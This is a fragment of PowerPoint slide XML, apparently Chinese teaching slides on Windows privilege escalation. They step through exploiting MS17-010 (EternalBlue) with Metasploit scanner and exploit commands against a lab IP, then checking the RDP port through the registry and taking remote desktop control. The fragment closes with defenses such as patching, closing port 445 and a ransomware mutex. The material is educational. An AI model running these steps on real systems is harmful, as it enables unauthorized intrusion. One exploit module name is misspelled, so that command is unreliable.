              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）	开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>平台：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DCD74EC-A852-48CF-8CA2-65D81305CB76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5151587" y="1532346"/>
            <a:ext cx="7040413" cy="5325654"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2120263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830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）	搜素漏洞模块：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>search 17-010</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57C3BB9B-9141-4343-A273-1A97FF401AE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4842588" y="1341959"/>
            <a:ext cx="7349412" cy="5516042"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3162335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3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）	使用模块进行检测，判断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端口是否可以被入侵：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&gt;use auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/smb_ms17_010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&gt;set RHOSTS 192.168.135.130</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&gt;run</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37B5D2E2-4ABC-4CDF-BBFA-FEEECA8FCA9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4891309" y="1371600"/>
            <a:ext cx="7300691" cy="5486400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2566486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2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）	使用攻击模块：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&gt;use exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/smf_ms17_010_eternableblue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&gt;set RHOST 192.168.135.130</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&gt;run</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0882751E-8350-4290-BF3F-A5A009DC41DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4861249" y="1084785"/>
            <a:ext cx="7330751" cy="5773215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="687875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461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）	成功入侵</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00B02485-200D-49DD-8243-7FD192E362FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4208106" y="751824"/>
            <a:ext cx="7996335" cy="6106176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="97827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678159" y="986300"/>
            <a:ext cx="9688029" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>4.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查看远程端口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）	通过注册表查看</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>运行：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>REG query HKLM\SYSTEM\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>\Control\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>TerminalServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>WinStations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>\RDP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>PortNumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{387A113A-578E-49F0-913A-DCA53FC01D19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="820861" y="3029338"/>
            <a:ext cx="5082540" cy="2590800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="245139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180728"/>
            <a:ext cx="4690391" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）	远控桌面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8743914-9617-4F2D-A847-25481F6F79EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4030824" y="539670"/>
            <a:ext cx="8161176" cy="6318330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6A1CC74-B8F1-405F-A52C-95F9DF99BC37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4030825" y="643076"/>
            <a:ext cx="8161176" cy="6214924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9017036-1B99-4379-A807-2E0DA326C386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4020052" y="946964"/>
            <a:ext cx="8171948" cy="5911036"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14122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四、解决方案</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675250"/>
            <a:ext cx="11483077" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>①打补丁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>此病毒能大范围传播正是由于很多机器没有打补丁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>被攻击之后导致中毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>没有中毒的机器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>尽快打补丁可以避免中毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>但是已经中毒的打补丁也没用了</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>②关闭端口 此病毒所利用漏洞只要利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>端口传播</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>关闭端口漏洞就无法利用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>③创建互斥体 此办法只适用于未变种版本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>由于病毒会检测是否创建互斥体</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>MsWinZonesCacheCounterMutexA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>用户可自行创建此互斥体</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>这样病毒检测到互斥体就不会进行加密操作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>④因为病毒是生成加密过的用户文件后再删除原始文件，所以存在通过文件恢复类工具恢复原始未加密文件的可能。但是因为病毒对文件系统的修改操作过于频繁，导致被删除的原始文件数据块被覆盖，致使实际恢复效果有限。且随着系统持续运行，恢复类工具恢复数据的可能性会显著降低。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2176737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50"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3311691" y="1124744"/>
            <a:ext cx="0" cy="4165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 name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3791745" y="1858924"/>
            <a:ext cx="7200800"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Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>提权基础</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2667" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990">
              <a:lnSpc>
                <a:spcPts val="5333"/>
              </a:lnSpc>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2667" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>MS17-010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990">
              <a:lnSpc>
                <a:spcPts val="5333"/>
              </a:lnSpc>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2667" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CVE-2017-11882</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2667" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="791411" y="1858923"/>
            <a:ext cx="2208245" cy="240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charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" algn="ctr" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" algn="ctr" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl7pPr>
